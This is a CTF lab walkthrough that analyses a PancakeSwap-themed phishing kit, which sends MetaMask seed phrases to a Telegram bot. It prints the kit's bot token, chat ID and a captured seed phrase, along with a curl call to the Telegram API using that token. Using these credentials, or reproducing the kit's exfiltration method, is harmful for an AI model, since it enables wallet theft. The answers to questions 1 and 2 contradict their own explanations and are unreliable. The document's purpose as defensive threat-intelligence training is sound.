An attacker compromised a server and impersonated https://pancakeswap.finance/, a decentralized exchange native to BNB Chain, to host a phishing kit at https://apankewk.soup.xyz/mainpage.php. The attacker set it as an open directory with the file name "pankewk.zip".
Provided the phishing kit, you are requested to analyze it and do your threat intel homework.
My Recommendations
Download it from CyberDefenders and verify it with:
sha1sum /path/to/c75-GrabThePhisher.zipSHA1SUM:Â e9321eaca235a927d617cb896cd9bfaafa66d321
Walkthrough
1. Which wallet is used for asking the seed phrase?
We can grep the directory for seed:
grep -r -i seed *
which returns two files: pankewk/metamask/index.html and
pankewk/src/networks.json. We can ‘pretty print’ the index.html with html2text:
html2text pankewk/metamask/index.html
The wallet is MetaMask.
Answer:Â 10.0.5.15
2. What is the file name that has the code for the phishing kit?
There is only one php file, which is pankewk/metamask/metamask.php.
The code reads the input and then sends a message over Telegram bot with the stolen credentials.
Answer: HTTP
3. In which language was the kit written?
Given the extension, and the contents of the file, the kit is written in PHP.
Answer: PHP
4. What service does the kit use to retrieve the victim's machine information?
The kit issues a request to Spyex Geo’s api with the Remote Address to find geographic locations:
Answer: Spyex Geo
5. How many seed phrases were already collected?
The seed phrase is stored as variable $text. The last line of the function sendTel shows that the file /log/log.txt appends the seed phrase each time it is run.
Looking at the contents of /log/log.txt there are three seed phrases:
Answer: 3
Â
6. Write down the seed phrase of the most recent phishing incident?
The most recent seed phrase would be the last line of the log.txt file, which is father also recycle embody balance concert mechanic believe owner pair muffin hockey .
Answer: father also recycle embody balance concert mechanic believe owner pair muffin hockey
7. Which medium had been used for credential dumping?
The function sendTel sends a message with the credentials using a Telegram Bot
Answer: Telegram
Â
8. What is the token for the channel?
The token is defined in the sendTel Function:
Answer: 5457463144:AAG8t4k7e2ew3tTi0IBShcWbSia0Irvxm10
9. What is the chat ID of the phisher's channel?
Again, the ChatID is defined in the sendTel function:
Answer: 5442785564
10. What are the allies of the phish kit developer?
The phish kit writer kindly left a message to all the hustlers out there 🥰 🥰
He/she signed the message with ‘j1j1b1s@m3r0’
Answer: j1j1b1s@m3r0
11. What is the full name of the Phish Actor?
Now, we need to use the Telegram API with the provided information. The method needed is getChat.
curl https://api.telegram.org/bot5457463144:AAG8t4k7e2ew3tTi0IBShcWbSia0Irvxm10/getChat?chat_id=5442785564 | jq .
Answer: Marcus Aurelius
12. What is the username of the Phish Actor?
In the request above, the username is pumpkinboii:
Answer: pumpkinboii
TLDR
– This challenge was easy, and fun and a way to understand how PHP phishing websites are created & how information can then be transfered to the attacker.
